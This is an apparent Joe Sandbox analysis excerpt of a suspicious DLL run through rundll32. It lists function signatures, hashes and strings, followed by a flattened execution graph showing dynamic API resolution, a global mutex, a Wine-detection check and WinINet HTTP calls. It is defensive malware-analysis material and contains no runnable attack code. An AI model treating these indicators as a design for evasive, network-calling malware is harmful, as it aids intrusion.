                                                                    • Instruction Fuzzy Hash: 2331D033B06641A6DE28CE15C404579A361F790BD0F18223BDA6E077D8DF39E849C754
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                                    • String ID: 0
                                                                    • API String ID: 323602529-4108050209
                                                                    • Opcode ID: 2e7e9fc904eb75d695e215548ad9ebea77f15dcf7aa71a62d1169850791a812e
                                                                    • Instruction ID: ff69dbf708054a5cfc6922ceebba59023b696c4f5593840bf1547deca0ee32d1
                                                                    • Opcode Fuzzy Hash: 2e7e9fc904eb75d695e215548ad9ebea77f15dcf7aa71a62d1169850791a812e
                                                                    • Instruction Fuzzy Hash: 2E31AF3261AB40EAD710DF20E4402ED37B4FB48798F500236EA9D43BA4DF38E559C754
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::runtime_error::runtime_errorthrow_exception
                                                                    • String ID: Day of month is not valid for year
                                                                    • API String ID: 3828811160-1521898139
                                                                    • Opcode ID: 84d2daf90518049316943645cf0e5bb3eec30a983e3c40179046461e36576ec1
                                                                    • Instruction ID: 8848fb2f8753feeb02ae70f4dbc91e674624bdffaf5675173746985d19518baf
                                                                    • Opcode Fuzzy Hash: 84d2daf90518049316943645cf0e5bb3eec30a983e3c40179046461e36576ec1
                                                                    • Instruction Fuzzy Hash: 7C214636F0A60291FB21CB25D8409792264FF947E0F510236EA7E87BE4CF3CD8459368
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _set_errno_from_matherr
                                                                    • String ID: exp
                                                                    • API String ID: 1187470696-113136155
                                                                    • Opcode ID: 02aa0f55b1a8874f43537a2706ad28b239fe5dfa3cfbce0507dbe8f83b3ef5ac
                                                                    • Instruction ID: 5007168f7be4468094ca66281c3d0acc186bb2555817500e866a44e314becb3a
                                                                    • Opcode Fuzzy Hash: 02aa0f55b1a8874f43537a2706ad28b239fe5dfa3cfbce0507dbe8f83b3ef5ac
                                                                    • Instruction Fuzzy Hash: 56211D36A1A646DBE760DF28A45126A73B1FB88780F500635F69D83B55EF3CE8448F24
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDeallocateMutexstd::_
                                                                    • String ID: Global\${C40CFCD4-C757-4139-A4DA-7CB51A8DBF80}
                                                                    • API String ID: 2784379168-266908802
                                                                    • Opcode ID: 02ab40d601c47c4bd6e5fdae253d9982c0720896644d64d585b2e25be54e70d6
                                                                    • Instruction ID: 58e6c98e87f995ae6924f15ee1e9e06f04915079cbea616824998ea348ebcd7b
                                                                    • Opcode Fuzzy Hash: 02ab40d601c47c4bd6e5fdae253d9982c0720896644d64d585b2e25be54e70d6
                                                                    • Instruction Fuzzy Hash: D421BB3261AA42A0EB20DB25E8411AA7371EB887F4F801332E6BD476E5DF3DD255C714
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF8A8D10814
                                                                      • Part of subcall function 00007FF8A8D14824: _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D1485D
                                                                      • Part of subcall function 00007FF8A8D04D08: WaitForSingleObjectEx.KERNEL32 ref: 00007FF8A8D04D62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentExceptionObjectSingleThreadThrowWait
                                                                    • String ID: boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                    • API String ID: 928027368-3352860666
                                                                    • Opcode ID: 994a6202a9c3685202e8c49310c65bffd27d361856865c6016e354541c512811
                                                                    • Instruction ID: cb8fb9279891191ec732c0f045c194d1bc74383aac1ef9c89752aa5d48b309cc
                                                                    • Opcode Fuzzy Hash: 994a6202a9c3685202e8c49310c65bffd27d361856865c6016e354541c512811
                                                                    • Instruction Fuzzy Hash: D721813190A6C2A1EB10EB24D4447A877A1FF44BE8F548235DA6D473C5CF3CE859C7A4
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocate__std_exception_copystd::_
                                                                    • String ID: Weekday is out of range 0..6
                                                                    • API String ID: 3694657363-1292618072
                                                                    • Opcode ID: 5712023aab23666bcc4aa939f3a77f028e085d8234eb82f5ada7f38f23bd60ce
                                                                    • Instruction ID: 1fa02ba8802aecf8bf45e5373eb1fce21a9c6f1c91723e8209e3464d4210106f
                                                                    • Opcode Fuzzy Hash: 5712023aab23666bcc4aa939f3a77f028e085d8234eb82f5ada7f38f23bd60ce
                                                                    • Instruction Fuzzy Hash: 00214832B15A01E8FB009BA4E8503AC37B4FB087A8F940135DA6D97AA9DF78D594C324
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocate__std_exception_copystd::_
                                                                    • String ID: Day of year value is out of range 1..366
                                                                    • API String ID: 3694657363-4072519960
                                                                    • Opcode ID: ab36d1336ac458bd2dea0bf6fadc49879dfd2f429f3452fa44419b5642cab8d2
                                                                    • Instruction ID: c7d45364c008a7dcdfe7e1a6a81ba19e878dffbcd5c763f871ddfd0fafbceabe
                                                                    • Opcode Fuzzy Hash: ab36d1336ac458bd2dea0bf6fadc49879dfd2f429f3452fa44419b5642cab8d2
                                                                    • Instruction Fuzzy Hash: 33214532B15A01E8FB00DBA4E8903AC37B4FB08798F940535DA6D97AA9DF38D595C324
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocate__std_exception_copystd::_
                                                                    • String ID: Year is out of valid range: 1400..10000
                                                                    • API String ID: 3694657363-2344417016
                                                                    • Opcode ID: 072e68aaa3e467892ea3da7818a1ab6e2fd58acdb12903a67d2c210c5a44a482
                                                                    • Instruction ID: 1e7d54d055b9494f967a342ade83acc3e8fb7ec2809ec644e70f44daa4357f31
                                                                    • Opcode Fuzzy Hash: 072e68aaa3e467892ea3da7818a1ab6e2fd58acdb12903a67d2c210c5a44a482
                                                                    • Instruction Fuzzy Hash: CE214832B15A01E8FB009BA4E8903AC37B4FB08798F940535DA6D97BA9DF78D595C324
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocate__std_exception_copystd::_
                                                                    • String ID: Month number is out of range 1..12
                                                                    • API String ID: 3694657363-4198407886
                                                                    • Opcode ID: 2a1ac6ef3aeba2bd9865e4ebf9b20a26fcd048e8fe28fa3fbc9b1659af5c6910
                                                                    • Instruction ID: 6fdc583e64f45f033f1030b6396b0e9de39c58d71bbbf2b933ce9917ed845462
                                                                    • Opcode Fuzzy Hash: 2a1ac6ef3aeba2bd9865e4ebf9b20a26fcd048e8fe28fa3fbc9b1659af5c6910
                                                                    • Instruction Fuzzy Hash: 0D214A32B15A01E8FB009B64E8503AC37B4FB48798F940135DA6D97AA9DF38D594C324
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: wine_get_version
                                                                    • API String ID: 1646373207-2902792109
                                                                    • Opcode ID: 64f094e310f04052f5700c1f6bd54cdd92774b9cc2459a96bcb2dc19004332e9
                                                                    • Instruction ID: 864d9c6e0f7313f4bf53ce34e79e95e8e8401c290b2df5594d49a643210c102b
                                                                    • Opcode Fuzzy Hash: 64f094e310f04052f5700c1f6bd54cdd92774b9cc2459a96bcb2dc19004332e9
                                                                    • Instruction Fuzzy Hash: AB119E30E0AAC2E6FA52D720B8513B533A0EF9D785F800135D89D42662EF3CE565CB28
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastMove
                                                                    • String ID: boost::filesystem::rename
                                                                    • API String ID: 55378915-2110873845
                                                                    • Opcode ID: 8dca8874bfb7dd6f7dfd873a9110266fd1d7c776757e538c1c404bb48a2eebbb
                                                                    • Instruction ID: 666ff8fd9bedd6f40849bf0711d38cc05da6dfbaed770cf99e5a5e08a48dc7f1
                                                                    • Opcode Fuzzy Hash: 8dca8874bfb7dd6f7dfd873a9110266fd1d7c776757e538c1c404bb48a2eebbb
                                                                    • Instruction Fuzzy Hash: 80F02231B0DB82D5EB008B12F84802A67A0FB55FC4F204035DE9D93B54DF3CE6A58368
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FreeLocal
                                                                    • String ID:
                                                                    • API String ID: 1627422176-0
                                                                    • Opcode ID: 0992fd39bbcecca185d899d48b70f7d57ffc834e00189db1b119eed07bf66011
                                                                    • Instruction ID: 9feadd7d2c80a50860be92826fe10d62ddf27b4a1d8a0aaf037cf40d2db3ad28
                                                                    • Opcode Fuzzy Hash: 0992fd39bbcecca185d899d48b70f7d57ffc834e00189db1b119eed07bf66011
                                                                    • Instruction Fuzzy Hash: E911B120F0E782AAFBD8AB22A45007A9291EF45FC5F540035ED5E477D2DF7CEC108A28
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: 2ee89589a5936ae31a689f7afc696f9c551bd5c68191e7446015a43d757db286
                                                                    • Instruction ID: cef74b87ca059d46a7ae97ed0c2f076cd9e916111a8c1aee72154f2e1a591406
                                                                    • Opcode Fuzzy Hash: 2ee89589a5936ae31a689f7afc696f9c551bd5c68191e7446015a43d757db286
                                                                    • Instruction Fuzzy Hash: C1114232A0578196DB148B76D85416DB361FF8ABF1F188235DA6E037E5EF7CD0158704
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF8A8D3352D), ref: 00007FF8A8DB98AB
                                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF8A8D3352D), ref: 00007FF8A8DB98BA
                                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF8A8D3352D), ref: 00007FF8A8DB98E7
                                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF8A8D3352D), ref: 00007FF8A8DB98F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: b6a1841932a90bcf3e84ed0c1c01948b9f25d7b071fcb00ce4f8261a13364298
                                                                    • Instruction ID: b70ee4f4f36f71a4f7bccf61a4d5632cdf5b1accc238a70cc193412edab06978
                                                                    • Opcode Fuzzy Hash: b6a1841932a90bcf3e84ed0c1c01948b9f25d7b071fcb00ce4f8261a13364298
                                                                    • Instruction Fuzzy Hash: 38119435E06741A6DB048B3594842396761EF8ABF1F189635DA7E033E4FF3CD5469218

                                                                    Execution Graph

                                                                    Execution Coverage:5.1%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:1294
                                                                    Total number of Limit Nodes:50
17534->17186 17535->17526 17536 27619653de0 RtlFreeHeap 17535->17536 17536->17535 17539 27619654759 17537->17539 17538 276196547af 17538->17190 17539->17538 17540 276196547ad NtFreeVirtualMemory 17539->17540 17540->17538 17726 27619633270 17541->17726 17544 27619653de0 RtlFreeHeap 17545 27619633ebe 17544->17545 17546 27619653de0 RtlFreeHeap 17545->17546 17547 27619633ee0 17546->17547 17548 27619653de0 RtlFreeHeap 17547->17548 17549 27619633f02 17548->17549 17550 2761964b4e0 RtlFreeHeap 17549->17550 17551 27619633f1d 17550->17551 17552 2761964b4e0 RtlFreeHeap 17551->17552 17553 27619633f61 17552->17553 17555 27619633fd9 17553->17555 17556 27619633fc0 17553->17556 17561 27619633fd7 17553->17561 17554 2761962a050 RtlFreeHeap 17557 27619634005 17554->17557 17558 2761962a050 RtlFreeHeap 17555->17558 17560 2761962a050 RtlFreeHeap 17556->17560 17556->17561 17559 2761964b4e0 RtlFreeHeap 17557->17559 17558->17561 17562 2761963400d 17559->17562 17560->17561 17561->17554 17561->17557 17563 2761964b4e0 RtlFreeHeap 17562->17563 17564 27619634015 17563->17564 17565 27619634067 17564->17565 17566 27619634060 17564->17566 17826 27619627830 17565->17826 17750 27619636fa0 17566->17750 17569 27619634065 17570 2761964b4e0 RtlFreeHeap 17569->17570 17571 2761963407f 17570->17571 17572 276196340bb 17571->17572 17573 2761963be20 RtlFreeHeap 17571->17573 17574 2761964b4e0 RtlFreeHeap 17572->17574 17575 276196340ac 17573->17575 17576 2761963411c 17574->17576 17577 276196340b3 17575->17577 17585 276196340bd 17575->17585 17578 2761964b4e0 RtlFreeHeap 17576->17578 17579 2761964b4e0 RtlFreeHeap 17577->17579 17580 27619634124 17578->17580 17579->17572 17581 2761964b4e0 RtlFreeHeap 17580->17581 17582 2761963412c 17581->17582 17583 2761964b4e0 RtlFreeHeap 17582->17583 17584 27619634139 17583->17584 17584->17190 17586 2761964b4e0 RtlFreeHeap 17585->17586 17586->17572 17588 27619628bde 17587->17588 17589 2761962a050 RtlFreeHeap 17588->17589 17590 27619628c5e 17589->17590 17591 2761962a050 
RtlFreeHeap 17590->17591 17592 27619628c97 17591->17592 17593 2761964b4e0 RtlFreeHeap 17592->17593 17594 27619628cee 17593->17594 17595 27619628d5c 17594->17595 17597 27619628d5e 17594->17597 17598 27619628d44 17594->17598 17596 2761962a050 RtlFreeHeap 17595->17596 17599 27619628d8b 17595->17599 17596->17599 17600 2761962a050 RtlFreeHeap 17597->17600 17598->17595 17602 2761962a050 RtlFreeHeap 17598->17602 17601 2761964b4e0 RtlFreeHeap 17599->17601 17600->17595 17603 27619628d93 17601->17603 17602->17595 17604 2761964b4e0 RtlFreeHeap 17603->17604 17605 27619628d9b 17604->17605 17606 27619628de9 17605->17606 17607 27619628df0 17605->17607 17608 27619636fa0 2 API calls 17606->17608 17609 27619627830 7 API calls 17607->17609 17610 27619628dee 17608->17610 17609->17610 17611 27619628e8e 17610->17611 17612 2761963be20 RtlFreeHeap 17610->17612 17872 276196217b0 17611->17872 17614 27619628e23 17612->17614 17616 27619628e2a 17614->17616 17621 27619628e34 17614->17621 17615 27619628e32 17617 2761964b4e0 RtlFreeHeap 17615->17617 17618 2761964b4e0 RtlFreeHeap 17616->17618 17619 27619628ea4 17617->17619 17618->17615 17620 2761964b4e0 RtlFreeHeap 17619->17620 17622 27619628eac 17620->17622 17624 2761964b4e0 RtlFreeHeap 17621->17624 17623 2761964b4e0 RtlFreeHeap 17622->17623 17625 27619628eb4 17623->17625 17626 27619628e5f 17624->17626 17627 2761964b4e0 RtlFreeHeap 17625->17627 17628 2761962a050 RtlFreeHeap 17626->17628 17629 27619628ebc 17627->17629 17630 27619628e71 17628->17630 17629->17190 17631 2761964b4e0 RtlFreeHeap 17630->17631 17632 27619628e79 17631->17632 17883 276196451d0 17632->17883 17635 2761964b4e0 RtlFreeHeap 17635->17611 17637 2761962fff9 17636->17637 17638 27619622939 17637->17638 17639 2761962cce0 LdrGetProcedureAddress 17637->17639 17656 2761962f8a0 17638->17656 17640 27619630072 17639->17640 17641 2761962cce0 LdrGetProcedureAddress 17640->17641 17642 2761963008d 17641->17642 17643 2761962cce0 LdrGetProcedureAddress 17642->17643 17644 276196300b6 17643->17644 
17645 2761962cce0 LdrGetProcedureAddress 17644->17645 17646 276196300d5 17645->17646 17647 2761962cce0 LdrGetProcedureAddress 17646->17647 17648 276196300f4 17647->17648 17649 2761962cce0 LdrGetProcedureAddress 17648->17649 17650 27619630113 17649->17650 17651 2761962cce0 LdrGetProcedureAddress 17650->17651 17652 27619630132 17651->17652 17653 2761962cce0 LdrGetProcedureAddress 17652->17653 17654 27619630151 17653->17654 17655 2761962cce0 LdrGetProcedureAddress 17654->17655 17655->17638 17657 2761962f8da 17656->17657 17658 2761962293e 17657->17658 17659 2761962cce0 LdrGetProcedureAddress 17657->17659 17664 27619633470 17658->17664 17660 2761962f900 17659->17660 17661 2761962cce0 LdrGetProcedureAddress 17660->17661 17662 2761962f91b 17661->17662 17663 2761962cce0 LdrGetProcedureAddress 17662->17663 17663->17658 17666 27619633489 17664->17666 17665 27619633493 17665->17199 17666->17665 17667 2761962cce0 LdrGetProcedureAddress 17666->17667 17668 27619633502 17667->17668 17669 2761962cce0 LdrGetProcedureAddress 17668->17669 17670 2761963351d 17669->17670 17671 2761962cce0 LdrGetProcedureAddress 17670->17671 17672 27619633546 17671->17672 17673 2761962cce0 LdrGetProcedureAddress 17672->17673 17674 27619633565 17673->17674 17675 2761962cce0 LdrGetProcedureAddress 17674->17675 17676 27619633584 17675->17676 17677 2761962cce0 LdrGetProcedureAddress 17676->17677 17678 276196335a3 17677->17678 17679 2761962cce0 LdrGetProcedureAddress 17678->17679 17680 276196335c2 17679->17680 17681 2761962cce0 LdrGetProcedureAddress 17680->17681 17682 276196335e1 17681->17682 17683 2761962cce0 LdrGetProcedureAddress 17682->17683 17684 27619633600 17683->17684 17685 2761962cce0 LdrGetProcedureAddress 17684->17685 17686 2761963361f 17685->17686 17687 2761962cce0 LdrGetProcedureAddress 17686->17687 17688 2761963363e 17687->17688 17689 2761962cce0 LdrGetProcedureAddress 17688->17689 17690 2761963365d 17689->17690 17691 2761962cce0 LdrGetProcedureAddress 17690->17691 17692 2761963367c 
17691->17692 17693 2761962cce0 LdrGetProcedureAddress 17692->17693 17694 2761963369b 17693->17694 17695 2761962cce0 LdrGetProcedureAddress 17694->17695 17696 276196336ba 17695->17696 17697 2761962cce0 LdrGetProcedureAddress 17696->17697 17698 276196336d9 17697->17698 17699 2761962cce0 LdrGetProcedureAddress 17698->17699 17700 276196336f8 17699->17700 17701 2761962cce0 LdrGetProcedureAddress 17700->17701 17702 27619633717 17701->17702 17703 2761962cce0 LdrGetProcedureAddress 17702->17703 17704 27619633736 17703->17704 17705 2761962cce0 LdrGetProcedureAddress 17704->17705 17706 27619633755 17705->17706 17707 2761962cce0 LdrGetProcedureAddress 17706->17707 17707->17665 17709 27619628eee CreateMutexExA 17708->17709 17710 27619653de0 17709->17710 17712 27619653e14 17710->17712 17711 27619628f71 17711->17336 17712->17711 17713 2761964b4e0 RtlFreeHeap 17712->17713 17713->17712 17715 27619628016 17714->17715 17716 2761964557b 17714->17716 17715->17374 17718 2761963be20 17715->17718 17716->17715 17717 2761964b4e0 RtlFreeHeap 17716->17717 17717->17715 17719 2761963be5c 17718->17719 17720 2761963bea5 17719->17720 17721 2761964b4e0 RtlFreeHeap 17719->17721 17720->17374 17721->17720 17724 2761962a084 17722->17724 17723 2761962a118 17723->17427 17724->17723 17725 2761964b4e0 RtlFreeHeap 17724->17725 17725->17724 17728 27619633287 17726->17728 17727 27619633291 17727->17544 17728->17727 17729 2761962cce0 LdrGetProcedureAddress 17728->17729 17730 27619633306 17729->17730 17731 2761962cce0 LdrGetProcedureAddress 17730->17731 17732 27619633321 17731->17732 17733 2761962cce0 LdrGetProcedureAddress 17732->17733 17734 2761963334a 17733->17734 17735 2761962cce0 LdrGetProcedureAddress 17734->17735 17736 27619633369 17735->17736 17737 2761962cce0 LdrGetProcedureAddress 17736->17737 17738 27619633388 17737->17738 17739 2761962cce0 LdrGetProcedureAddress 17738->17739 17740 276196333a7 17739->17740 17741 2761962cce0 LdrGetProcedureAddress 17740->17741 17742 276196333c6 17741->17742 17743 
2761962cce0 LdrGetProcedureAddress 17742->17743 17744 276196333e5 17743->17744 17745 2761962cce0 LdrGetProcedureAddress 17744->17745 17746 27619633404 17745->17746 17747 2761962cce0 LdrGetProcedureAddress 17746->17747 17748 27619633423 17747->17748 17749 2761962cce0 LdrGetProcedureAddress 17748->17749 17749->17727 17751 27619637037 17750->17751 17752 27619637319 17751->17752 17753 276196370a9 17751->17753 17754 2761964b4e0 RtlFreeHeap 17752->17754 17849 276196293f0 17753->17849 17756 2761963732d 17754->17756 17758 276196293f0 RtlFreeHeap 17756->17758 17760 27619637339 17758->17760 17759 2761962a050 RtlFreeHeap 17761 276196370ce 17759->17761 17762 2761962a050 RtlFreeHeap 17760->17762 17763 276196293f0 RtlFreeHeap 17761->17763 17764 2761963734d 17762->17764 17765 276196370d9 17763->17765 17767 276196293f0 RtlFreeHeap 17764->17767 17766 2761962a050 RtlFreeHeap 17765->17766 17768 27619637106 17766->17768 17769 27619637358 17767->17769 17855 27619627370 17768->17855 17770 2761962a050 RtlFreeHeap 17769->17770 17772 27619637385 17770->17772 17773 27619627370 2 API calls 17772->17773 17775 276196373b9 17773->17775 17774 27619637740 17776 2761964b4e0 RtlFreeHeap 17774->17776 17775->17774 17778 2761964b4e0 RtlFreeHeap 17775->17778 17777 2761963775a 17776->17777 17777->17569 17779 276196373cc 17778->17779 17781 276196293f0 RtlFreeHeap 17779->17781 17780 2761964b4e0 RtlFreeHeap 17798 2761963713a 17780->17798 17783 276196373db 17781->17783 17782 27619637257 17785 2761964b4e0 RtlFreeHeap 17782->17785 17803 27619637452 17782->17803 17787 2761962a050 RtlFreeHeap 17783->17787 17784 276196293f0 RtlFreeHeap 17784->17798 17788 27619637282 17785->17788 17786 2761964b4e0 RtlFreeHeap 17786->17803 17796 27619637409 17787->17796 17790 276196293f0 RtlFreeHeap 17788->17790 17789 2761962a050 RtlFreeHeap 17789->17798 17793 27619637292 17790->17793 17791 276196293f0 RtlFreeHeap 17791->17803 17792 27619627370 2 API calls 17792->17796 17794 2761962a050 RtlFreeHeap 17793->17794 17801 276196372d1 
17794->17801 17795 2761962a050 RtlFreeHeap 17795->17803 17796->17792 17796->17803 17797 27619627370 2 API calls 17797->17798 17798->17774 17798->17780 17798->17782 17798->17784 17798->17789 17798->17797 17799 27619627370 2 API calls 17799->17801 17800 27619627370 2 API calls 17800->17803 17801->17799 17801->17803 17802 276196374f8 17804 2761963750e 17802->17804 17805 2761964b4e0 RtlFreeHeap 17802->17805 17803->17786 17803->17791 17803->17795 17803->17800 17803->17802 17804->17774 17806 2761964b4e0 RtlFreeHeap 17804->17806 17805->17804 17807 27619637529 17806->17807 17808 2761962a050 RtlFreeHeap 17807->17808 17811 2761963754c 17808->17811 17809 27619627370 2 API calls 17809->17811 17810 2761964b4e0 RtlFreeHeap 17810->17811 17811->17809 17811->17810 17815 276196375b1 17811->17815 17812 2761964b4e0 RtlFreeHeap 17812->17815 17813 276196293f0 RtlFreeHeap 17813->17815 17814 27619627370 2 API calls 17814->17815 17815->17774 17815->17812 17815->17813 17815->17814 17816 2761963769e 17815->17816 17817 2761962a050 RtlFreeHeap 17815->17817 17818 2761964b4e0 RtlFreeHeap 17816->17818 17817->17815 17819 276196376a6 17818->17819 17820 276196293f0 RtlFreeHeap 17819->17820 17821 276196376b2 17820->17821 17822 2761962a050 RtlFreeHeap 17821->17822 17825 276196376e5 17822->17825 17823 27619627370 2 API calls 17823->17825 17824 2761964b4e0 RtlFreeHeap 17824->17825 17825->17774 17825->17823 17825->17824 17827 2761962788a InternetOpenW 17826->17827 17828 27619627885 17826->17828 17829 27619627898 InternetConnectW 17827->17829 17830 27619627aed 17827->17830 17828->17827 17829->17830 17835 276196278dd 17829->17835 17831 27619627b0e InternetCloseHandle 17830->17831 17832 27619627b17 17830->17832 17831->17832 17833 27619627b56 17832->17833 17836 27619627b8c 17832->17836 17837 27619627b60 17832->17837 17834 2761964b4e0 RtlFreeHeap 17833->17834 17833->17837 17834->17837 17835->17830 17838 276196279cb HttpSendRequestA 17835->17838 17839 2761962a050 RtlFreeHeap 17836->17839 17837->17569 
